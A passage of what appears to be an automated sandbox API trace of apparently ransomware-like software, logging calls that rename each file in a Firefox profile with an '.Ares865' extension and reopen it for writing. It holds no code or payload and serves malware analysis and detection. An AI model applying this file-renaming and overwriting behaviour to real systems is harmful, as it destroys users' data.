halpmcxz\\local settings\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status.ares865"), dwFlags=0x1) returned 1 [0097.123] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.123] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12) returned 1 [0097.127] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox" [0097.127] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles" [0097.128] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0097.128] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_.Ares865") returned 108 [0097.128] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_.ares865"), dwFlags=0x1) returned 1 [0097.130] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.130] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1) returned 1 [0097.133] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails" [0097.134] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.Ares865") returned 142 [0097.134] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.ares865"), dwFlags=0x1) returned 1 [0097.135] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.135] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16560) returned 1 [0097.139] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.Ares865") returned 142 [0097.139] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.ares865"), dwFlags=0x1) returned 1 [0097.140] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.140] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16560) returned 1 [0097.144] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.Ares865") returned 142 [0097.144] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.ares865"), dwFlags=0x1) returned 1 [0097.148] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.148] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=115554) returned 1 [0097.157] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache" [0097.158] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little.Ares865") returned 129 [0097.158] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little.ares865"), dwFlags=0x1) returned 1 [0097.159] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.159] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=940534) returned 1 [0097.210] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing" [0097.210] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.Ares865") returned 133 [0097.210] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.ares865"), dwFlags=0x1) returned 1 [0097.212] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.212] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=44) returned 1 [0097.217] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.Ares865") returned 132 [0097.217] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.ares865"), dwFlags=0x1) returned 1 [0097.218] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.218] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16) returned 1 [0097.221] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.Ares865") returned 135 [0097.221] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.ares865"), dwFlags=0x1) returned 1 [0097.223] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.223] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=232) returned 1 [0097.226] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.Ares865") returned 131 [0097.226] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.ares865"), dwFlags=0x1) returned 1 [0097.227] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.228] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=44) returned 1 [0097.231] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.Ares865") returned 130 [0097.231] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.ares865"), dwFlags=0x1) returned 1 [0097.232] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.232] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16) returned 1 [0097.235] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.Ares865") returned 133 [0097.235] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.ares865"), dwFlags=0x1) returned 1 [0097.237] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.237] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=232) returned 1 [0097.240] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache" [0097.240] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache" [0097.241] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_.Ares865") returned 112 [0097.241] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_.ares865"), dwFlags=0x1) returned 1 [0097.242] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.242] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4194304) returned 1 [0097.356] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_.Ares865") returned 112 [0097.356] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_.ares865"), dwFlags=0x1) returned 1 [0097.358] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.358] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4194304) returned 1 [0097.467] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_.Ares865") returned 112 [0097.467] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_.ares865"), dwFlags=0x1) returned 1 [0097.469] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.469] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4194304) returned 1 [0097.583] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_.Ares865") returned 112 [0097.583] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local 